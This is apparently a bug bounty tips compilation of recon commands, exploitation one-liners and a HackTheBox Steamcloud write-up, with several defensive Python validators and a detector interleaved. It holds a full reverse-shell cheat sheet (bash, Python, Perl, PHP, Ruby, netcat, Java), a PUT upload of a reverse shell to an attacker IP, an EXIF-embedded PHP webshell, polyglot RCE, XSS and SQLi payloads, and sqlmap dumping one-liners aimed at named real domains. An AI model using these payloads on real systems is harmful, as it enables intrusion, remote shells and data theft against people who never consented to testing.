Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
🚀🤌Bug Bounty Tips!!!🔥🔥
Quick tricks
```bash
# Web ports for nmap
80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672
# Technology scanner
# github.com/urbanadventure…
whatweb https://url.com
# Screenshot web
# github.com/maaaaz/webscre…
# github.com/sensepost/gowi…
# github.com/michenriksen/a…
# Trigger an error with this input
%E2%A0%80%0A%E2%A0%80
# Retrieve additional info:
/favicon.ico/..%2f
/lol.png%23
/../../../
?debug=1
/server-status
/files/..%2f..%2f
# Change default header to accept */*
Accept: application/json, text/javascript, */*; q=0.01
# Sitemap to wordlist (httpie)
http target.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' > wordlist_endpoints.txt
# Bypass Rate Limits:
# Use different params:
sign-up, Sign-up, SignUp
# Null byte on params:
%00, %0d%0a, %09, %0C, %20, %0
# Bypass upload restrictions:
# Change extension: .pHp3 or pHp3.jpg
# Modify mimetype: Content-type: image/jpeg
# Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
# Add gif header: GIF89a;
# All at the same time.
# ImageTragic (memory leaks in gif preview)
# github.com/neex/gifoeb
./gifoeb gen 512x512 dump.gif
# Upload dump.gif multiple times, check if preview changes.
# Check docs for exploiting
# If upload from web is allowed or :
# medium.com/@shahjerry33/p…
# iplogger.org/invisible/
# iplogger.org/15bZ87
# Check HTTP options:
# Check if it is possible to upload
curl -v -k -X OPTIONS https://10.11.1.111/
# If PUT enabled, upload:
curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
curl -i -X PUT -H "Content-Type: text/plain; charset=utf-8" -d "/root/Desktop/meterpreter.php" http://VICTIMIP:8585/uploads/meterpreter.php
# If PUT is not allowed, try to override:
X-HTTP-Method-Override: PUT
X-Method-Override: PUT
# Retrieve endpoints
# LinkFinder
# github.com/GerbenJavado/L…
python linkfinder.py -i example.com -d
python linkfinder.py -i burpfile -b
# Retrieve hidden parameters
# Tools
# github.com/s0md3v/Arjun
python3 arjun.py -u url.com --get
python3 arjun.py -u url.com --post
# github.com/maK-/parameth
python parameth.py -u example.com/test.php
# github.com/devanshbatham/…
python3 paramspider.py --domain example.com
# github.com/s0md3v/Parth
python3 parth.py -t example.com
# .DS_Store files?
# github.com/gehaxelt/Pytho…
python main.py samples/.DS_Store.ctf
# Polyglot RCE payload
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
# Nmap web scan
nmap --script "http-*" example.com -p 443
# SQLi + XSS + SSTI
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for SQL injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
# Try to connect with netcat to port 80
nc -v host 80
# Understand URL params with unfurl
# dfir.blog/unfurl/
```
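Every upload trick in the list above (case-changed extension, spoofed Content-Type, a `GIF89a;` header in front of script code, a script hidden in an EXIF comment) only works against a server that trusts what the client says about the file. Here is an added example, not code from this channel or any tool it links, of an upload check that decides on the bytes instead and never lets the client's filename reach disk. The allow-list, MIME mapping, size limit and random storage name are assumptions for the demo:

```python
import re
import secrets
from pathlib import PurePosixPath

# Constructed policy (assumption): allow-listed extensions, the MIME type each must be
# declared as, and the magic bytes the body must start with.
ALLOWED = {
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}
# Server-side script openers that never belong inside an image, whatever the header says.
# This is what catches "GIF89a;<?php ..." and a <?php tag smuggled in via an EXIF comment.
SCRIPT_MARKERS = re.compile(rb"<\?(php|=)|<%|<script|#!/", re.IGNORECASE)
MAX_BYTES = 5 * 1024 * 1024  # assumption: 5 MiB limit


def validate_upload(filename: str, declared_type: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, detail). On success detail is the server-chosen storage name,
    on failure the reason. Every decision is made on the bytes, not on client claims."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    name = PurePosixPath(filename).name.lower()        # drop any path components
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if ext not in ALLOWED:                              # case folded: .pHp3 == .php3
        return False, f"extension not allowed: {ext or '(none)'}"
    expected_mime, magics = ALLOWED[ext]
    # Content-Type is attacker controlled; it only has to agree with the allow-listed ext.
    if declared_type.split(";", 1)[0].strip().lower() != expected_mime:
        return False, "Content-Type does not match extension"
    if not any(data.startswith(m) for m in magics):
        return False, "body does not start with the magic bytes for ." + ext
    if SCRIPT_MARKERS.search(data):
        return False, "script marker inside image body"
    # The client's name never reaches disk: a random name means shell.php.jpg and
    # path tricks in the filename can never be interpreted by the web server.
    return True, f"{secrets.token_hex(8)}.{ext}"
```

The stored name is generated server-side, so only the last extension matters and it has to be on the allow-list; double extensions and traversal in the client filename become irrelevant. Pair this with serving the upload directory without any script handler.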
Bug Bounty Tips!!! 😎😎😎👌👌👌👌
SSRF on Steroids 🔥🔥☄️☄️☄️☄️☄️
Methodology
Step 1: Subdomain Enumeration
•DNS Dumpster
•Sublist3r
•Amass
•Google Dorking
•Certificate Transparency Logs
•subdomainer
Step 2: Find Live Domains
cat all-domains.txt | httpx > all-live.txt
Step 3: Identify All URLs
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt
Step 4: Inject a Burp Collaborator URL into the Parameters
cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Test for SSRF Vulnerabilities
cat ssrf.txt | httpx -fr
Step 6: How to check which URL is vulnerable
split -l 10 ssrf.txt output_file_
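The methodology above finds SSRF by swapping every parameter value for a Collaborator host and watching for the callback. On the defending side the same bug is closed by validating the destination before the server fetches it. The following is an added example, not code from this channel, of such a check with an injectable resolver so it runs offline; the allowed schemes and ports, the constructed DNS table and the host names are assumptions:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical policy for a URL-fetching feature (webhooks, link previews): plain web
# schemes and ports only, and only destinations that resolve to public addresses.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses. is_global is False for
    RFC 1918, loopback, link-local (cloud metadata lives there), CGNAT and ULA."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast


def system_resolve(host):
    """Live resolver: every A/AAAA answer for the host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_outbound_url(url, resolve=system_resolve):
    """Return (allowed, reason, pinned_ip). The caller must connect to pinned_ip (sending
    the name in the Host header) instead of resolving again, otherwise a DNS answer that
    changes between check and use (rebinding) defeats the check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", None
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL", None
    host = parts.hostname
    if not host:
        return False, "no host", None
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "bad port", None
    if port not in ALLOWED_PORTS:
        return False, "port not allowed", None
    try:
        addrs = resolve(host)
    except (OSError, ValueError):
        return False, "unresolvable host", None
    if not addrs:
        return False, "unresolvable host", None
    for addr in addrs:                  # every answer must be public, not just the first
        if not is_public_address(addr):
            return False, f"resolves to non-public address {addr}", None
    return True, "ok", addrs[0]


# Constructed DNS table standing in for real resolution during the demonstration.
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "intranet.example.com": ["10.0.0.5"],
    "dual.example.com": ["93.184.216.34", "10.0.0.9"],   # one public and one private answer
}


def fake_resolve(host):
    try:
        return [str(ipaddress.ip_address(host))]   # literal IPs resolve to themselves
    except ValueError:
        pass
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    raise OSError("NXDOMAIN: " + host)
```

Checking every resolved address, not only the first, is what stops the "one public A record, one private A record" trick, and pinning the returned IP is what stops rebinding; a redirect from the fetched URL must go through the same check again.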
Bug Bounty Tips: Finding additional targets connected to your widescope target.
Have you exhausted your options for discovering associated assets through CIDR, Reverse WHOIS, Favicon Hash, DNS Records, Acquisitions, etc.?
Here's another method to identify additional assets related to a target site: explore tag history. This site reveals all associated assets based on the usage of the same tag.
Here's how to access this valuable data:
1️⃣ You must login to builtwith.com
2️⃣ Visit builtwith.com/relationships/…
You'll find a list of assets associated with your target domain. Use this information to further verify, investigate, and hunt for potential findings on additional targets.
#BugBounty #HackerOne #BugCrowd #BugBountyTips #SecurityTips 🐛🔍🛡️
Bug bounty Cheatsheet:
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management
LaTeX Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Upload Bypass Tricks
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
Reverse Shell Cheat Sheet
Bash;
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python;
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PERL;
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP;
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby;
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat;
nc -e /bin/sh 10.0.0.1 1234
Java;
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm;
xterm -display 10.0.0.1:1
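Every entry in the sheet above leaves a very recognisable process command line, which is what process-creation telemetry (auditd, EDR) sees. As an added example, not code from this channel, here is a small detector that runs the patterns over constructed events; the indicator regexes are written from the shapes in the sheet only, the event tuples and user names are made up, and the thresholds are for the demo:

```python
import re

# (label, regex) pairs built from the command shapes in the cheat sheet above.
# Tune them to your fleet before paging anyone on them.
INDICATORS = [
    ("bash /dev/tcp redirect",     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}")),
    ("netcat -e shell",            re.compile(r"\bnc(?:at)?\b.*\s-e\s+/bin/(?:ba)?sh\b")),
    ("python socket dup2 shell",   re.compile(r"socket\.socket\(.*dup2\(.*/bin/(?:ba)?sh")),
    ("perl socket exec shell",     re.compile(r"use Socket;.*connect\(.*exec\(\"/bin/(?:ba)?sh")),
    ("php fsockopen shell",        re.compile(r"fsockopen\(.*exec\(\"/bin/(?:ba)?sh")),
    ("ruby TCPSocket exec shell",  re.compile(r"TCPSocket\.open\(.*exec\b")),
    ("shell bound to a socket fd", re.compile(r"/bin/(?:ba)?sh -i\s*<&\d+\s*>&\d+")),
]


def scan_cmdline(cmdline):
    """Labels of every indicator that matches one process command line."""
    return [label for label, rx in INDICATORS if rx.search(cmdline)]


def scan_events(events):
    """events: iterable of (pid, user, cmdline) as exported from process-creation
    telemetry. Returns one alert dict per matching process."""
    alerts = []
    for pid, user, cmdline in events:
        hits = scan_cmdline(cmdline)
        if hits:
            alerts.append({"pid": pid, "user": user, "indicators": hits, "cmdline": cmdline})
    return alerts


# Constructed process-creation events: three taken from the sheet above, two benign.
PY_ONE_LINER = ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
                "socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0);"
                "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")
EVENTS = [
    (4012, "www-data", "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"),
    (4013, "www-data", PY_ONE_LINER),
    (4014, "www-data", "nc -e /bin/sh 10.0.0.1 1234"),
    (4015, "alice",    "python3 -c 'import socket; print(socket.gethostname())'"),
    (4016, "alice",    "nc -zv db.internal 5432"),
]

if __name__ == "__main__":
    for alert in scan_events(EVENTS):
        print(alert["pid"], alert["user"], alert["indicators"])
```

The parent process matters as much as the pattern: a web server user such as www-data spawning any of these is a much stronger signal than an engineer's interactive shell, so a real rule would weight the user and parent fields too.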
Here's a neatly rewritten summary of my CTF notes on steamcloud hackthebox:
Target System: Kubernetes API on 10.10.11.133
Port 8443 Analysis:
- Found various DNS and IP entries indicating Kubernetes services.
Tools Installation:
- Installed `kubectl` for Kubernetes interaction. [Installation Guide](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/)
- Installed kubeletctl for kubelet interaction. GitHub Link
Commands and Explorations:
1. Kubernetes Cluster Info:
kubectl --server https://10.10.11.133:8443 get pod/namespaces/cluster-info
2. Running Pods Enumeration with kubeletctl:
kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.name, .namespace]'
- Found running pods in kube-system and nginx.
3. Executing Commands in Pod:
kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx
- This retrieves the user identity information from the nginx pod.
4. Extracting User Text File:
kubeletctl -s 10.10.11.133 exec "cat /root/user.txt" -p nginx -c nginx
- Retrieved user.txt content: 5327f7xxxxxxxxxxxxxxxxxxxx.
5. Shell Access Preparation:
- Used base64 encoding for bash reverse shell command:
echo "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" | base64 -w0
- Alternatively, direct command execution for shell access:
kubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx
6. Exploring Kubernetes Service Account:
- Checked /run/secrets/kubernetes.io/serviceaccount for CA certificate, namespace, and service token.
7. Token Extraction and Permissions Check:
export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)
kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
8. Creating and Deploying Malicious Pod:
- Created a YAML file for a new pod with root access.
- Deployed the pod using:
kubectl apply -f evil-pod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
9. Root Flag Retrieval:
kubeletctl exec "cat /root/root/root.txt" -s 10.10.11.133 -p nginxt -c nginxt
- Root flag: fabcaxxxxxxxxxxxxxxxxxxxx
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/ @cyb3rhunt3r
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
go install github.com/Tanmay-N/CORS-Scanner@latest
cat CORS-domain.txt | CORS-Scanner
____________________
## Nmap Scanning :-
#- nmap -sS -p- 192.168.1.4 (-sS) Avoid Firewall && Connection Log.
#- nmap -sS -p- -iL hosts.txt
#- nmap -Pn -sS -A -sV -sC -p 17,80,20,21,22,23,24,25,53,69,80,123,443,1723,4343,8081,8082,8088,53,161,177,3306,8888,27017,27018,139,137,445,8080,8443 -iL liveips.txt -oN scan-result.txt
#- nmap -Pn -A -sV -sC 67.20.129.216 -p 17,80,20,21,22,23,24,25,53,69,80,123,443,1723,4343,8081,8082,8088,53,161,177,3306,8888,27017,27018,139,137,445,8080,8443 -oN scan-result.txt --script=vuln
#- nmap -sT -p- 192.168.1.4 (Full Scan (TCP)).
#- nmap -sT -p- 192.168.1.5 --script=banner (Services Fingerprinting).
#- nmap -sV 192.168.1.4 (Services Fingerprinting).
#- nmap 192.168.1.5 -O (OS Fingerprinting).
#- nmap 192.168.1.0-255 -sn (-sn) Live hosts in my network.
#- nmap -iL hosts.txt -sn
#- nc -nvz 192.168.1.4 1-65535 (Port Scanning Using nc).
#- nc -vn 34.66.209.2 22 (Services Fingerprinting).
#- netdiscover (Devices On Network) (Layer2).
#- netdiscover -r 192.168.2.0/24 (Range).
#- netdiscover -p (Passive).
#- netdiscover -l hosts.txt
______________________
## Running Nuclei :-
Scanning target domain with community-curated nuclei templates :-
- nuclei -u https://example.com
- nuclei -list urls.txt -t /fuzzing-templates
- nuclei -list live-subs.txt -t /root/nuclei-templates/vulnerabilities -t /root/nuclei-templates/cves -t /root/nuclei-templates/exposures -t /root/nuclei-templates/sqli.yaml
- nuclei -u https://example.com -w workflows/
______________________
## Open Redirect:-
Open Redirection OneLiner :-
- waybackurls tesorion.nl | grep -a -i \=http | qsreplace 'evil.com' | while read host; do curl -s -L "$host" -I | grep "evil.com" && echo -e "$host \033[0;31mVulnerable\n"; done
- httpx -l i.txt -path "///evil.com" -status-code -mc 302
_________________
## Resources And Tools :-
https://github.com/orwagodfather/x
https://github.com/SAPT01/HBSQLI
python3 hbsqli.py -l y.txt -p payloads.txt -H headers.txt -v
python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
https://github.com/thecybertix/One-Liner-Collections
https://github.com/projectdiscovery/fuzzing-templates
https://github.com/0xKayala/NucleiFuzzer
https://wpscan.com/vulnerability/825eccf9-f351-4a5b-b238-9969141b94fa
_________________
####### 📌 Complete Bug Bounty tool List 📌
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
nmap https://nmap.org
masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
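The open-redirect one-liners above probe `=http` parameters and the `///evil.com` form. On the application side the fix is to never echo the `next`/`redirect` value and instead resolve it against your own origin and refuse anything that leaves it. Added example, not code from this channel; `example.com` as the site origin and the `default` landing path are assumptions:

```python
from urllib.parse import urlsplit, urljoin


def naive_is_local(next_param):
    """The check that gets bypassed: a leading slash is not enough, because //evil.com
    and /\\evil.com both start with '/' and both leave the site in a browser."""
    return next_param.startswith("/")


def safe_redirect_target(next_param, site_origin="https://example.com", default="/"):
    """Return a redirect target that stays on site_origin, else `default`.
    site_origin is a hypothetical application origin; next_param is untrusted."""
    if not next_param:
        return default
    raw = next_param.strip()
    # Browsers treat backslashes as slashes in http(s) URLs, so normalise first.
    raw = raw.replace("\\", "/")
    site = urlsplit(site_origin)
    # Resolve the value the way a browser would, then refuse anything that did not
    # land on exactly our scheme and host (so no downgrade to http, no other port).
    candidate = urljoin(site_origin.rstrip("/") + "/", raw)
    final = urlsplit(candidate)
    if final.scheme.lower() != site.scheme.lower() or final.netloc.lower() != site.netloc.lower():
        return default
    return candidate
```

Comparing the resolved result rather than the raw string is the point: `///evil.com`, `//evil.com`, `/\evil.com`, `https://example.com@evil.com/` and `https://example.com.evil.com/` all collapse to a host that is not ours after resolution, while ordinary relative paths and full URLs on the site come through untouched.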
## Check-list :- Manual Hunting inside websites for :-
1- CSRF
2- IDORS
3- Business Logic Vulnerabilities
4- API bugs
5- SQLi
6- XSS
______________________
## XSS :-
- Paramspider :-
- python3 paramspider.py --domain indrive.com
- python3 paramspider.py --domain https://cpcalendars.cartscity.com --exclude woff,css,js,png,svg,php,jpg --output g.txt
- cat indrive.txt | kxss ( looking for reflected :- "<> )
## Looking for Hidden parameters :-
- Arjun :-
- arjun -u https://44.75.33.22wms/wms.login -w burp-parameter-names.txt
- waybackurls youneedabudget.com | gf xss | grep '=' | qsreplace '"><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo -e "$host \033[0;31mVulnerable\n"; done
- dalfox url https://access.epam.com/auth/realms/plusx/protocol/openid-connect/auth?response_type=code -b https://hahwul.xss.ht
- dalfox file urls.txt -b https://hahwul.xss.ht
- echo "https://target.com/some.php?first=hello&last=world" | Gxss -c 100
- cat urls.txt | Gxss -c 100 -p XssReflected
______________________
## Sql Injection :-
- echo https://www.recreation.gov | waybackurls | grep "\?" | uro | httpx -silent > param.txt
- cat subdomains.txt | waybackurls | grep "\?" | uro | httpx -silent > param.txt
- sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt
- sqlmap -u https://my.easyname.at/en/login --dbs --forms --crawl=2
## SQLi One-Liner :-
- cat target.com | waybackurls | grep "\?" | uro | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
- subfinder -dL domains.txt | dnsx | waybackurls | uro | grep "\?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
## Dump-Data :-
- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dbs (Databases)
- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --tables -D acuart (Dump DB tables )
- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --columns -T users (Dump Table Columns )
- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dump -D acuart -T users
______________________
## SSTI :-
For testing SSTI with the tplmap tool :-
- git clone https://github.com/epinna/tplmap.git
- ./tplmap.py -u "domain.com/?parameter=SSTI*"
______________________
- httpx -l live_subs.txt --status-code --title -mc 200 -path /phpinfo.php
- httpx -l live_subs.txt --status-code --title -mc 200 -path /composer.json
______________________
######## Testing for xss and sqli at the same time >_< ##############
- cat subdomains.txt | waybackurls | uro | grep "\?" | httpx -silent > param.txt
- sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt
- cat param.txt | kxss
______________________
## Blind SQL Injection :-
Tips : X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
## Blind XSS :-
site:opsgenie.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form"
## Go to the xss.report website and create an account to test for blind XSS vulnerabilities
______________________
## Hunting For CORS Misconfiguration :-
https://github.com/chenjj/CORScanner
pip install corscanner
corscanner -i live_subdomains.txt -v -t 100
____________________
https://github.com/Tanmay-N/CORS-Scanner
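CORScanner and CORS-Scanner flag the same handful of server mistakes: reflecting whatever `Origin` arrives, matching it by prefix or suffix, or trusting `null`, each combined with `Access-Control-Allow-Credentials: true`. Added example, not code from this channel or either scanner, of the weak pattern next to the one that survives those checks; the allow-listed origins are assumptions:

```python
from urllib.parse import urlsplit

# Constructed allow-list (assumption): the exact origins, scheme + host [+ port],
# that may read credentialed responses from this API.
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def cors_headers(request_origin, allowed=ALLOWED_ORIGINS, allow_credentials=True):
    """CORS response headers for one request, or {} when the Origin is not trusted.
    Exact match on the whole origin: no reflection, no prefix/suffix match, no 'null'."""
    if not request_origin or request_origin == "null":
        return {}
    parts = urlsplit(request_origin)
    if parts.scheme != "https" or not parts.hostname:
        return {}
    if parts.path not in ("", "/") or parts.query or parts.fragment or parts.username:
        return {}                      # a real Origin header carries none of these
    origin = f"{parts.scheme}://{parts.netloc.lower()}"
    if origin not in allowed:
        return {}
    headers = {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    if allow_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def weak_cors_headers(request_origin):
    """The misconfiguration the scanners report: suffix matching plus reflection.
    Any origin whose name merely ends in example.com, e.g. https://evil-example.com,
    is handed credentialed access."""
    if request_origin and request_origin.endswith("example.com"):
        return {"Access-Control-Allow-Origin": request_origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}
```

`Vary: Origin` matters once the header value depends on the request, otherwise a cache can serve one origin's allow header to another; and an origin on a different port is a different origin, so `https://app.example.com:8443` is rejected unless it is listed.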
My methodology
## Recon :-
- subfinder
subfinder -dL domains.txt -o subfinder.txt
subfinder -d inholland.nl -o subfinder.txt
- amass
go install -v github.com/OWASP/Amass/v3/...@master
amass enum -passive -norecursive -noalts -df domains.txt -o amass.txt
- crtfinder
python3 crtfinder.py -u alloyhome.com
- sublist3r
sublist3r -d safesavings.com -o sublist3r.txt
- site:*.ibm.com -site:www.ibm.com
- # Merging subdomains into one file :- all-subs.txt
cat amass.txt subfinder.txt gobuster_subs.txt other.txt | anew all-subs.txt
